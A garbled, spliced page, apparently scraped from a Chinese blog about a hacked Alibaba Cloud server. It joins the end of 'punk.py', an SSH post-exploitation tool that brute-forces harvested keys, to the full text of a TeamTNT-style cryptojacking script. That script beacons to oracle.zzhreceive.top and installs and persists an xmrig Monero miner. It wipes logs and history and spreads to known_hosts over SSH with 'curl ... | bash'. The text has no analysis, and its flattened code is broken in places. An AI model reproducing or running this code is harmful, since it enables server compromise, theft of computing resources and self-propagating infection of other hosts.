    """Convert dotted ipv4 string to int"""
    # note: use socket for packed binary then struct to unpack
    return struct.unpack("!I", socket.inet_aton(ipv4_str))[0]

def inet_itoa(ipv4_int):
    """Convert int to dotted ipv4 string"""
    # note: use struct to pack then socket to string
    return socket.inet_ntoa(struct.pack("!I", ipv4_int))

def ipv4_range(ipaddr):
    """Return a list of IPv4 address contianed in a cidr address range"""
    # split out for example 192.168.1.1:22/24
    ipv4_str, port_str, cidr_str = re.match(
        r'([\d\.]+)(:\d+)?(/\d+)?', ipaddr).groups()

    # convert as needed
    ipv4_int = inet_atoi(ipv4_str)
    port_str = port_str or ''
    cidr_str = cidr_str or ''
    cidr_int = int(cidr_str[1:]) if cidr_str else 0

    # mask ipv4
    ipv4_base = ipv4_int & (0xffffffff << (32 - cidr_int))

    # generate list
    addrs = [inet_itoa(ipv4_base + val)
        for val in range(1 << (32 - cidr_int) + 2)]
    return addrs


if __name__ == "__main__":

	sys.stdout.write ("""\033[92m
             |
         \   |   /
    .     \  |  /    .
     `-.__|\/_\/|_.-'
   .__  \ /     `./  
      `-        @|
     .-'`.  !!    -   \033[90m-=[ \033[93mpunk.py - unix SSH post-exploitation 1337 tool\033[92m
    '     `  !  __.'  \033[90m-=[ \033[93mby `r3vn` ( tw: @r3vnn )\033[92m
          _)___(      \033[90m-=[ \033[93mhttps://xfiltrated.com\033[92m
        \n\033[0m""")


	parser = argparse.ArgumentParser()
	parser.add_argument('--home', help='custom home path',default="/home/")
	parser.add_argument('--run','-r', help='run commands on compromised hosts',default="")
	parser.add_argument('--no-passwd', dest='passwd', action='store_false', default=True, help='skip passwd check')
	parser.add_argument('--crack','-c', help='crack hashed known_hosts files',default="",metavar='subnet')
	parser.add_argument('--threads','-t', type=int, help='brute-focing threads',default=4)
	args = parser.parse_args()

	sys.stdout.write ("\033[92m[*]\033[0m enumerating valid users with ssh keys...\n")
	discovery(args)
	sys.stdout.write ("\033[92m[*]\033[0m Done.\n")

	if len(sshKeys) <= 0:
		sys.stdout.write ("\033[93m[!]\033[0m No valid SSH keys found on the system.\n")
		sys.exit()
	else:
		sys.stdout.write ("\033[92m[*]\033[0m SSH keys found:\n\033[92m\n")

		for key in sshKeys:
			sys.stdout.write ("\t" + key + "\n")

	if len(users) <= 0:
		sys.stdout.write ("\n\033[93m[!]\033[0m No valid users found on the system.\n")
		sys.exit()
	else:
		sys.stdout.write ("\n\033[92m[*]\033[0m Users found:\n\033[92m\n")

		for user in users:
			sys.stdout.write ("\t" + user + "\n" )#+ " :: " + targets[user]

	if len(knownHosts) <= 0:
		sys.stdout.write ("\n\033[93m[!]\033[0m No valid known hosts found on the system.\n")
		sys.exit()

	else:
		sys.stdout.write ("\n\033[92m[*]\033[0m known hosts found:\n\033[92m\n")

		for host in knownHosts:
			sys.stdout.write ("\t"+ host+ "\n")

	sys.stdout.write ("\n\033[92m[*]\033[0m Starting keys bruteforcing...\n")
	Attack = attack(args.run, args.threads)

	Attack.run()
	sys.stdout.write ("\033[92m[*]\033[0m Attack Complete!\n")



		

' | base64 -d > /usr/bin/pu; chmod +x /usr/bin/pu fi }function checksshkeys(){ if [ -f /usr/share/[crypto].log ]; then curl http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null cur http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null cd1 http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null TNTcurl http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null wget -q -O- http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null wge -q -O- http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null wd1 -q -O- http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null else curl http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null cur http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null cd1 http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null TNTcurl http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null wget -q -O- http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null wge -q -O- http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null wd1 -q -O- http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null fi cat /home/hilde/.ssh/authorized_keys|grep root@puppetserver >/dev/null if (test $? -ne 0); then curl http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null cur http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null cd1 http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null TNTcurl http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null wget -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null wge -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null else curl http://oracle.zzhreceive.top/b2f628/authok >>/dev/null cur http://oracle.zzhreceive.top/b2f628/authok >>/dev/null cd1 http://oracle.zzhreceive.top/b2f628/authok >>/dev/null TNTcurl http://oracle.zzhreceive.top/b2f628/authok >>/dev/null wget -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null wge -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null ficat /root/.ssh/authorized_keys|grep root@puppetserver >/dev/null if (test $? -ne 0); then curl http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null cur http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null cd1 http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null TNTcurl http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null wget -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null wge -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null else curl http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null cur http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null cd1 http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null TNTcurl http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null wget -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null wge -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null fi }function SetupMoneroOcean(){ function SetupMoneroOcean1(){ # printing intentions echo "[*] Downloading MoneroOcean advanced version of xmrig to /tmp/xmrig.tar.gz" if ! curl -L --progress-bar "$MOxmrigMOD" -o /tmp/xmrig.tar.gz; thenecho "ERROR: Can't download $MOxmrigMOD file to /tmp/xmrig.tar.gz" fiecho "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/" [ -d $MOHOME/ ] || mkdir $MOHOME/ if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/; thenecho "ERROR: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory" fi chmod +x $MOHOME/\[crypto\] rm /tmp/xmrig.tar.gzecho "[*] Checking if advanced version of $MOHOME/xmrig works fine (and not removed by antivirus software)" $MOHOME/[crypto] --help >/dev/null if (test $? -ne 0); thenif [ -f $MOHOME/[crypto] ]; thenecho "WARNING: Advanced version of $MOHOME/xmrig is not functional"else echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"fiecho "[*] Looking for the latest version of Monero miner"#LATEST_XMRIG_RELEASE=`curl -s https://github.com/xmrig/xmrig/releases/latest | grep -o '".*"' | sed 's/"//g'`LATEST_XMRIG_LINUX_RELEASE=$MOxmrigSTOCKecho "[*] Downloading $LATEST_XMRIG_LINUX_RELEASE to /tmp/xmrig.tar.gz"if ! curl -L --progress-bar $LATEST_XMRIG_LINUX_RELEASE -o /tmp/xmrig.tar.gz; thenecho "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz"fiecho "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/ --strip=1; thenecho "WARNING: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"firm /tmp/xmrig.tar.gz chmod +x $MOHOME/\[crypto\]echo "[*] Checking if stock version is OKAY!"$MOHOME/[crypto] --help >/dev/nullif (test $? -ne 0); then if [ -f $MOHOME/[crypto] ]; thenecho "ERROR: Stock version of $MOHOME/[crypto] is not functional too"else echo "ERROR: Stock version of $MOHOME/[crypto] was removed by antivirus too"fiecho "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz"fi fiecho "[*] $MOHOME/[crypto] is OK" }######################### printing greetings ########################### clear echo -e " " echo -e " \e[1;34;49m___________ _____________________________\033[0m" echo -e " \e[1;34;49m\__ ___/___ _____ ____\__ ___/\ \__ ___/\033[0m" echo -e " \e[1;34;49m | |_/ __ \\__ \ / \| | / | \| | \033[0m" echo -e " \e[1;34;49m | |\ ___/ / __ \| Y Y \ | / | \ | \033[0m" echo -e " \e[1;34;49m |____| \___ >____ /__|_| /____| \____|__ /____| \033[0m" echo -e " \e[1;34;49m \/ \/ \/ \/ \033[0m" echo -e " " echo -e " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ " echo -e " " echo -e " \e[1;34;49m Now you get, what i want to give... --- ''' \033[0m" echo " " echo " "if [ "$(id -u)" == "0" ]; thenecho "running as root... its all OKAY!" elseecho "running not as root... first starting tmp setup..."fi# checking prerequisitesif [ -z $WALLET ]; thenecho "ERROR: wallet" fiWALLET_BASE=`echo $WALLET | cut -f1 -d"."` if [ ${#WALLET_BASE} != 95 ]; thenecho "ERROR: Wrong wallet base address length (should be 95): ${#WALLET_BASE}" fiif [ -z $MOHOME ]; thenecho "ERROR: Please define HOME environment variable to your home directory" fiif [ ! -d $MOHOME ]; thenecho "ERROR: Please make sure HOME directory $MOHOME exists or set it yourself using this command:"echo ' export HOME=<dir>' fiif ! type curl >/dev/null; then apt-get update --fix-missing 2>/dev/null 1>/dev/null apt-get install -y curl 2>/dev/null 1>/dev/null apt-get install -y --reinstall curl 2>/dev/null 1>/dev/null yum clean all 2>/dev/null 1>/dev/null yum install -y curl 2>/dev/null 1>/dev/null yum reinstall -y curl 2>/dev/null 1>/dev/null fisleep 2 $MOHOME/[crypto] --help >/dev/null if (test $? -ne 0); thenSetupMoneroOcean1 elseecho "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)" fiif [ -f "$MOHOME/[crypto].pid" ]thenecho "config file exists, neednot backup"elseecho "config file not exists.download from teamtnt"SetupMoneroOcean1 fiif [ -f "$MOHOME/[crypto]" ]thenecho "miner file exists"elsecurl -L --progress-bar $miner_url -o /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && mv $MOHOME/xmrig*/xmrig $MOHOME/\[crypto\] fiif [ -f "$MOHOME/[crypto].pid" ] thenecho "miner config exists" elsecurl -L --progress-bar $config_url -o $MOHOME/\[crypto\].pid firm /tmp/xmrig.tar.gzif [ -f "$MOHOME/[crypto]" ]thenecho "miner file exists, neednot backup"elsecurl -L --progress-bar $miner_url_backup -o /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && chmod +x $MOHOME/\[crypto\] firm /tmp/cf.tarsed -i 's/"url": *"[^"]*",/"url": "xmr-asia1.nanopool.org:14444",/' $MOHOME/[crypto].pid sed -i 's/"user": *"[^"]*",/"user": "'$WALLET'",/' $MOHOME/[crypto].pid sed -i 's/"coin": *[^"]*,/"coin": "monero",/' $MOHOME/[crypto].pid sed -i 's/"max-threads-hint": *[^,]*,/"max-threads-hint": 50,/' $MOHOME/[crypto].pid sed -i 's#"log-file": *null,#"log-file": "'$MOHOME/[crypto].log'",#' $MOHOME/[crypto].pid sed -i 's/"syslog": *[^,]*,/"syslog": true,/' $MOHOME/[crypto].pidcp $MOHOME/[crypto].pid $MOHOME/config_background.json sed -i 's/"background": *false,/"background": true,/' $MOHOME/config_background.json# preparing scriptecho "[*] Creating $MOHOME/[crypto].sh script" cat >$MOHOME/[crypto].sh <<EOL #!/bin/bash if ! pidof [crypto] >/dev/null; thennice $MOHOME/[crypto] \$* elseecho "Monero miner is already running in the background. Refusing to run another one."echo "Run \"killall xmrig\" or \"sudo killall xmrig\" if you want to remove background miner first." fi EOLchmod +x $MOHOME/[crypto].sh# preparing script background work and work under rebootif ! sudo -n true 2>/dev/null; thenif ! grep $MOHOME/[crypto].sh /root/.profile >/dev/null; thenecho "[*] Adding $MOHOME/[crypto].sh script to /root/.profile"echo "$MOHOME/[crypto].sh --config=$MOHOME/config_background.json >/dev/null 2>&1" >>/root/.profileelse echo "Looks like $MOHOME/[crypto].sh script is already in the /root/.profile"fiecho "[*] Running crypto service in the background (see logs in $MOHOME/[crypto].log file)"/bin/bash $MOHOME/[crypto].sh --config=$MOHOME/config_background.json >/dev/null 2>&1 elseif [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; thenecho "[*] Enabling huge pages"echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.confsudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))fiif ! type systemctl >/dev/null; then/bin/bash $MOHOME/[crypto].sh --config=$MOHOME/config_background.json >/dev/null 2>&1elseecho "[*] Creating crypto systemd service" chmod +x /usr/bin/systemctlcat >/tmp/crypto.service <<EOL [Unit] Description=crypto system service[Service] ExecStart=$MOHOME/[crypto] --config=$MOHOME/[crypto].pid Restart=always Nice=10 CPUWeight=1[Install] WantedBy=multi-user.target EOLsudo mv /tmp/crypto.service /etc/systemd/system/crypto.serviceecho "[*] Starting crypto systemd service"sudo killall [crypto] 2>/dev/nullsudo systemctl daemon-reloadsudo systemctl enable crypto.servicesudo systemctl start crypto.servicefi fi}localgo() { echo > /var/spool/mail/root echo > /var/log/wtmp echo > /var/log/secure if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; thenfor h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- http://oracle.zzhreceive.top/b2f628/b.sh | bash >/dev/null 2>&1 &' & done fi if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; thenfor h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'cd1 -o- http://oracle.zzhreceive.top/b2f628/b.sh | bash >/dev/null 2>&1 &' & done fi }KILLMININGSERVICESSetupMoneroOceanmakesshaxxchecksshkeysSecureTheSystemFixTheSystemif [ ! -f "/var/tmp/.alsp" ]; then localgo echo 'lockfile' > /var/tmp/.alsp tntrecht +i /var/tmp/.alsp || chattr +i /var/tmp/.alsp else echo "replay .. i know this server ..." exit fiecho "" echo "[*] Setup complete" curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/iss.sh | bash cd1 -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/iss.sh | bash history -c## now the bad part of the script###

總結

以上是生活随笔為你收集整理的阿里云服务器被入侵执行MoneroOcean(门罗币)挖矿脚本的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。